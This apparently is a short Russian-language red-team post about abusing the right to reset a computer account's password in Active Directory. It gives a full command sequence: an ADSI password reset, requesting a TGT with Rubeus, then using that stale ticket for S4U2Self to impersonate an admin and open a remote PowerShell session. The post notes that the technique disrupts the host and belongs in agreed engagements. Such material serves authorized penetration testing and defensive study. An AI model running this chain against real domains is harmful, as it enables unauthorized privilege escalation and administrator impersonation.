Права на сброс пароля компьютеру Неделю назад в чате RedTeam Brazzers один из участников задал вопрос, если есть права на сброс пароля для объекта компьютер, то единственный вектор эксплуатации только при условии, что компьютер имеет какие-то привилегии на другие объекты. Я предположил, что можно попробовать выписывать TGT билеты до того момента как администраторы вернут машине доверие в домене (сбросят пароль через сам компьютер), дальше использовать этот TGT билет Kerberos (пока он валидный) для получения доступа на хост через S4U2Self. Мне ответили, что пройти аутентификацию уже будет невозможно. Сначала я согласился с этим ответом, но сама мысль не давала мне покоя. Я решил проверить свою гипотезу в лаборатории. В результате записал демо, в котором видно, что после восстановления доверия между компьютером (пароль меняется) все еще можно выполнять технику S4U2Self со «старым» TGT билетом Kerberos. Последовательность команд $object = [ADSI]"LDAP://CN=WS-238,CN=Computers,DC=domain,DC=local" $object.Invoke("SetPassword", "Qwerty123") $object.CommitChanges() .\Rubeus.exe asktgt /user:ws-238$ /password:Qwerty123 /domain:domain.local /dc:dc01.domain.local /outfile:ws-238.kirbi # Ждем, когда администраторы восстановят доверие между доменом и компьютером # Test-ComputerSecureChannel -Repair -Credential (Get-Credential) .\Rubeus.exe purge # можно использовать runas.exe /netonly .\Rubeus.exe s4u /impersonateuser:admin /self /altservice:http/ws-238 /user:ws-238$ /domain:domain.local /dc:dc01.domain.local /ptt /ticket:ws-238.kirbi Enter-PSSession ws-238 По умолчанию срок жизни TGT билета Kerberos 10 часов для обычных учетных записей и 4 часа для входящих в группу Protected Users. Но компьютеры не будут входить в эту группу. Данная вектор нарушает работу хоста и должен выполняться по согласованию с заказчиком. #Внутрянка #ActiveDirectory